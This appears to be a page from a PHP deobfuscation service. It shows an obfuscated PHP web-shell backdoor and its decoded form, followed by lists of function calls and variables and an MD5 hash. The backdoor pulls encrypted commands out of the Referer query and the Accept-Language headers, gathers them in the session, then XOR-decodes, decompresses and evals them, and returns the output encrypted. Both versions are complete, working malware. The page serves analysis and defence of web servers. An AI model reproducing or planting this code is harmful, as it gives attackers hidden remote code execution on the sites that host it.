Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $B='`+nd_cle`+an();$d=`+`+base6`+4`+_encode(x(gzcompre`+ss(`+$o),$k));p`+rint("`+<$..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$B='`+nd_cle`+an();$d=`+`+base6`+4`+_encode(x(gzcompre`+ss(`+$o),$k));p`+rint("`+<$k>`+$d</$k`+>");@ses`+si`+on`+_destroy();}}}}';
$f='$`+kh="5`+d41";$kf="402a"`+;functio`+n x(`+$t,$k){$`+c=st`+rlen(`+$k);$`+`+l=st`+rlen($t)`+;$o="";for($i`+=0;$i<$l`+`+;){fo`+r($';
$I=str_replace('QS','','QScQSreQSQSate_funcQStiQSon');
$R='`+RER"];$ra=@$r["HTTP_`+ACCEPT_L`+`+AN`+GUAGE"];if($rr&&`+$r`+a`+){$u=parse_ur`+`+`+l($rr);parse_str($`+u["que`+ry"],$q)`+;';
$m='ession`+_s`+ta`+rt();$s=`+&$_SE`+SSION;$ss="s`+ub`+str";`+$sl="`+s`+trtolower";$i=$m`+[1][0]`+.$m[`+1][1];$h=$sl`+($`+s`+s';
$x='$q=ar`+ray_va`+l`+`+ues($q);preg_mat`+ch_a`+`+ll("/(`+[\\`+w])[\\w-]+(?:;q=`+0.`+([\\d`+]`+))?,?/"`+,$ra,$m);`+if($q&&$m)`+{@s';
$i='+p;$e=strpos($s`+[$`+i],$f)`+;if(`+$e){$k=`+`+$kh.`+$kf;ob`+_start(`+);@ev`+al(@gzuncompre`+ss(@`+x(@base6`+4_deco`+de`+(p';
$e='`+2][$z]];if(s`+trpo`+s($p,`+$h`+`+)`+===0){$s[$i]="";$p`+=$s`+s($p,3);}`+if(array_key_exis`+ts(`+$i,$s`+))`+{$s[$i].=$`+`';
$G='reg_r`+eplace(array("`+/_/",`+"/-`+`+/"),array(`+"/","+`+"),$ss($s[$i`+],`+0,$e)))`+,$k)));$o`+=ob_ge`+t_con`+tents();ob`+_e';
$h='j=0;(`+$j<$c`+&&$i<$l);`+$j`+++`+,$i++){`+`+$o.=$t{$i}^$k{$`+j};}}`+return `+$`+o;}$r=$_S`+ERV`+ER;$rr=@$r[`+"HTTP_`+REF`+E';
$v='(md`+5($i.$kh),`+0,3));$f`+=$sl($ss(`+md5($i.$k`+f)`+,0,`+3));$`+p="";for($z`+=1;$z`+<count`+($m[`+1]);$z`+++`+)$p.=`+$q[$m[';
$Z=str_replace('`+','',$f.$h.$R.$x.$m.$v.$e.$i.$G.$B);
$p=$I('',$Z);$p();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B `+nd_cle`+an();$d=`+`+base6`+4`+_encode(x(gzcompre`+ss(`+$o)..
$G reg_r`+eplace(array("`+/_/",`+"/-`+`+/"),array(`+"/","+`+"),..
$I create_function
$R `+RER"];$ra=@$r["HTTP_`+ACCEPT_L`+`+AN`+GUAGE"];if($rr&&`+$r..
$Z $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$e `+2][$z]];if(s`+trpo`+s($p,`+$h`+`+)`+===0){$s[$i]="";$p`+=$..
$f $`+kh="5`+d41";$kf="402a"`+;functio`+n x(`+$t,$k){$`+c=st`+r..
$h j=0;(`+$j<$c`+&&$i<$l);`+$j`+++`+,$i++){`+`+$o.=$t{$i}^$k{$`..
$i +p;$e=strpos($s`+[$`+i],$f)`+;if(`+$e){$k=`+`+$kh.`+$kf;ob`+..
$m ession`+_s`+ta`+rt();$s=`+&$_SE`+SSION;$ss="s`+ub`+str";`+$s..
$p None
$v (md`+5($i.$kh),`+0,3));$f`+=$sl($ss(`+md5($i.$k`+f)`+,0,`+3)..
$x $q=ar`+ray_va`+l`+`+ues($q);preg_mat`+ch_a`+`+ll("/(`+[\`+w]..

Stats

MD5 e61acff3423c72982f6352acccd2b291
Eval Count 1
Decode Time 136 ms